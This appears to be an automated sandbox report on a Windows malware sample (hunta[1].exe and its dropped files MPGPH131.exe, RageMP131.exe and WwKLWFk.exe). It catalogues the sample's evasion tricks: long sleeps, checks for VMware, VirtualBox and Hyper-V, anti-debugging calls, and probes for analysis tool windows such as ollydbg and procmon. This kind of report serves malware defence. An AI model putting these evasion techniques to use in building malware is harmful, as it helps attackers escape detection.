Source: C:\Users\user\Desktop\hunta[1].exe TID: 8100 Thread sleep count: 230 > 30 Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 1732 Thread sleep count: 101 > 30 Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 1732 Thread sleep time: -202101s >= -30000s Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 6944 Thread sleep count: 110 > 30 Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 6944 Thread sleep time: -220110s >= -30000s Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7860 Thread sleep time: -32000s >= -30000s Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8108 Thread sleep count: 1232 > 30 Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8108 Thread sleep time: -124432s >= -30000s Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8008 Thread sleep count: 1134 > 30 Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8008 Thread sleep count: 777 > 30 Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8008 Thread sleep time: -77700s >= -30000s Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 6956 Thread sleep count: 115 > 30 Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 6956 Thread sleep time: -230115s >= -30000s Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8176 Thread sleep count: 121 > 30 Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8176 Thread sleep time: -242121s >= -30000s Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8180 Thread sleep count: 118 > 30 Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8180 Thread sleep time: -236118s >= -30000s Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 2088 Thread sleep count: 86 > 30 Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 2088 Thread sleep time: -172086s >= -30000s Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 1824 Thread sleep count: 128 > 30 Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 1824 Thread sleep time: -256128s >= -30000s Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7176 Thread sleep count: 138 > 30 Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7176 Thread sleep time: -276138s >= -30000s Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8128 Thread sleep count: 1223 > 30 Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8128 Thread sleep time: -123523s >= -30000s Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 1708 Thread sleep count: 1103 > 30 Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 1708 Thread sleep count: 710 > 30 Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 1708 Thread sleep time: -71000s >= -30000s Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 6220 Thread sleep count: 123 > 30 Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 6220 Thread sleep time: -246123s >= -30000s Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7236 Thread sleep count: 129 > 30 Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7236 Thread sleep time: -258129s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 1560 Thread sleep count: 1226 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 1560 Thread sleep time: -2453226s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 3688 Thread sleep count: 1247 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 3688 Thread sleep time: -2495247s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 6876 Thread sleep count: 126 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 1200 Thread sleep count: 558 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 1200 Thread sleep time: -1116558s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 6876 Thread sleep count: 260 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 4948 Thread sleep count: 1432 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 4948 Thread sleep time: -2865432s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 2288 Thread sleep count: 253 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 1696 Thread sleep count: 570 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 1696 Thread sleep time: -1140570s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 2800 Thread sleep count: 1021 > 30
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 2800 Thread sleep time: -2043021s >= -30000s
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 2732 Thread sleep count: 1047 > 30
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 2732 Thread sleep time: -2095047s >= -30000s
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 2312 Thread sleep count: 105 > 30
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 2788 Thread sleep count: 1008 > 30
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 2788 Thread sleep time: -2017008s >= -30000s
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 2312 Thread sleep count: 281 > 30
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 6996 Thread sleep count: 229 > 30
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 3092 Thread sleep count: 1013 > 30
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 3092 Thread sleep time: -2027013s >= -30000s
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 3136 Thread sleep count: 927 > 30
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 3136 Thread sleep time: -1854927s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Last function: Thread delayed
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Last function: Thread delayed
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Last function: Thread delayed
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Uses the system / local time for branch decision (may execute only at specific dates)
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Code function: 4_2_00211718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00211754h 4_2_00211718
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Code function: 22_2_00B51718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00B51754h 22_2_00B51718
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Code function: 4_2_002129E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose, 4_2_002129E2
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Code function: 22_2_00B529E2 wsprintfA,Sleep,memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose, 22_2_00B529E2
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Code function: 4_2_00212B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread, 4_2_00212B8C
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\ Jump to behavior
Source: Amcache.hve.4.dr Binary or memory string: VMware
Source: RageMP131.exe, 00000018.00000002.3735277102.0000000000EC8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}.:^G
Source: Amcache.hve.4.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: WwKLWFk.exe, 00000004.00000002.1418971368.000000000116E000.00000004.00000020.00020000.00000000.sdmp, WwKLWFk.exe, 00000004.00000003.1288946208.00000000011E6000.00000004.00000020.00020000.00000000.sdmp, WwKLWFk.exe, 00000004.00000003.1288946208.00000000011B0000.00000004.00000020.00020000.00000000.sdmp, WwKLWFk.exe, 00000004.00000002.1418971368.00000000011E6000.00000004.00000020.00020000.00000000.sdmp, WwKLWFk.exe, 00000016.00000003.1487791068.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, WwKLWFk.exe, 00000016.00000002.1647432122.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, WwKLWFk.exe, 00000016.00000002.1647432122.0000000000A98000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: MPGPH131.exe, 0000000F.00000002.3734938152.0000000000FBD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll*
Source: MPGPH131.exe, 0000000F.00000002.3734938152.0000000000FCF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.4.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: MPGPH131.exe, 0000000F.00000002.3734938152.0000000000FCF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}/
Source: RageMP131.exe, 00000015.00000002.3735676016.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000ok\AppData\Local\Temp\heidig8C
Source: RageMP131.exe, 00000018.00000002.3735277102.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&
Source: MPGPH131.exe, 0000000E.00000002.3734942241.0000000001091000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.4.dr Binary or memory string: vmci.sys
Source: RageMP131.exe, 00000015.00000002.3735676016.0000000000EC4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: #disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: RageMP131.exe, 00000015.00000002.3735676016.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll<
Source: RageMP131.exe, 00000018.00000002.3735277102.0000000000EC8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: -c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_86D2EBBA
Source: Amcache.hve.4.dr Binary or memory string: VMware20,1
Source: MPGPH131.exe, 0000000F.00000002.3734938152.0000000000FBD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}Y
Source: Amcache.hve.4.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.4.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.4.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.4.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: RageMP131.exe, 00000015.00000002.3735676016.0000000000EC4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 9e146be9-c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_86D2EBBA
Source: Amcache.hve.4.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.4.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: RageMP131.exe, 00000018.00000002.3735277102.0000000000EC8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}/:VN)
Source: Amcache.hve.4.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.4.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.4.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: MPGPH131.exe, 0000000E.00000002.3734942241.0000000001091000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&z
Source: Amcache.hve.4.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: RageMP131.exe, RageMP131.exe, 00000018.00000002.3730064373.000000000053D000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Amcache.hve.4.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.4.dr Binary or memory string: vmci.syshbin
Source: RageMP131.exe, 00000015.00000002.3735676016.0000000000EC4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}a
Source: Amcache.hve.4.dr Binary or memory string: VMware, Inc.
Source: RageMP131.exe, 00000018.00000003.1589365836.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: MPGPH131.exe, 0000000E.00000002.3734942241.00000000010A3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: -c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_86D2EBBA2
Source: Amcache.hve.4.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.4.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.4.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: MPGPH131.exe, 0000000F.00000002.3734078403.00000000009FD000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}|
Source: Amcache.hve.4.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: hunta[1].exe, 00000002.00000002.3735222371.0000000001ACE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: WARE\ACPI\DSDT\VBOX__G
Source: Amcache.hve.4.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: MPGPH131.exe, 0000000E.00000003.1382508816.00000000010A3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}X
Source: Amcache.hve.4.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: hunta[1].exe, 00000002.00000002.3735222371.0000000001B00000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000000E.00000002.3734942241.0000000001091000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 00000018.00000002.3735277102.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: WwKLWFk.exe, 00000016.00000002.1647432122.0000000000AAB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.4.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.4.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.4.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.4.dr Binary or memory string: VMware-42 27 ae 88 8c 2b 21 02-a5 86 22 5b 84 51 ac f0
Source: Amcache.hve.4.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: RageMP131.exe, 00000015.00000002.3735676016.0000000000E70000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000Fc
Source: WwKLWFk.exe, 00000016.00000002.1647432122.0000000000A18000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW`-
Source: WwKLWFk.exe, 00000004.00000002.1418971368.000000000116E000.00000004.00000020.00020000.00000000.sdmp, WwKLWFk.exe, 00000004.00000003.1288946208.0000000001188000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWL
Source: MPGPH131.exe, 0000000F.00000002.3734938152.0000000000FBD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&>
Source: hunta[1].exe, 00000002.00000002.3735222371.0000000001B00000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&<
Source: hunta[1].exe, 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 0000000E.00000002.3729391873.00000000005CD000.00000040.00000001.01000000.00000009.sdmp, MPGPH131.exe, 0000000F.00000002.3729271658.00000000005CD000.00000040.00000001.01000000.00000009.sdmp, RageMP131.exe, 00000015.00000002.3730030285.000000000053D000.00000040.00000001.01000000.0000000B.sdmp, RageMP131.exe, 00000018.00000002.3730064373.000000000053D000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\hunta[1].exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\hunta[1].exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\hunta[1].exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Thread information set: HideFromDebugger
Potentially malicious time measurement code found
Source: C:\Users\user\Desktop\hunta[1].exe Code function: 2_2_059B0CB7 Start: 059B0C8C End: 059B0C88 2_2_059B0CB7
Source: C:\Users\user\Desktop\hunta[1].exe Code function: 2_2_059B07B1 Start: 059B0A7B End: 059B077B 2_2_059B07B1
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 24_2_04E200D8 Start: 04E201A2 End: 04E200AA 24_2_04E200D8
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: SICE
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\hunta[1].exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\hunta[1].exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\hunta[1].exe Process queried: DebugPort Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\hunta[1].exe Code function: 2_2_059B056A rdtsc 2_2_059B056A
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\hunta[1].exe Code function: 2_2_01431044 mov eax, dword ptr fs:[00000030h] 2_2_01431044
Source: C:\Users\user\Desktop\hunta[1].exe Code function: 2_2_00E94AB0 mov eax, dword ptr fs:[00000030h] 2_2_00E94AB0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 14_2_008B1044 mov eax, dword ptr fs:[00000030h] 14_2_008B1044
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 14_2_00314AB0 mov eax, dword ptr fs:[00000030h] 14_2_00314AB0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 15_2_008B1044 mov eax, dword ptr fs:[00000030h] 15_2_008B1044
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 15_2_00314AB0 mov eax, dword ptr fs:[00000030h] 15_2_00314AB0
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 21_2_00821044 mov eax, dword ptr fs:[00000030h] 21_2_00821044
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 21_2_00284AB0 mov eax, dword ptr fs:[00000030h] 21_2_00284AB0
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 24_2_00821044 mov eax, dword ptr fs:[00000030h] 24_2_00821044
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 24_2_00284AB0 mov eax, dword ptr fs:[00000030h] 24_2_00284AB0
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\149657b0.bat" " Jump to behavior
Source: hunta[1].exe, hunta[1].exe, 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Program Manager
Source: SciTE.exe.4.dr Binary or memory string: Ctrl+RightLeftDownUpDecimalMinusMultiplyDivideTabSpaceDeleteEscapeEndInsertEnterHomeForwardBackwardPLAT_WIN1PageDownPageUpMenuWinSciTEACCELSSciTEWindowContentSciTEWindowPLAT_WINNT1toolbar.largecreate.hidden.consolegbkbig5euc-krshift_jisutf-8asciilatin2latin1translation.encodingwindows-1251ScaleFactoriso-8859-5cyrillic1250iso8859-11SciTE_HOMEAppsUseLightThemeSciTE_USERHOMESciTE_HOMEPropertiesScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Themes\PersonalizeEmbeddedRich Text FormatButtonShell_TrayWndUSERPROFILESciTE_HOMEHtmlHelpWHHCTRL.OCX
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\hunta[1].exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\hunta[1].exe Code function: 2_2_00F5C92A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 2_2_00F5C92A
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Code function: 4_2_0021139F GetVersionExA,LookupPrivilegeValueA,GetCurrentProcessId, 4_2_0021139F
Source: C:\Users\user\Desktop\hunta[1].exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
AV process strings found (often used to terminate AV products)
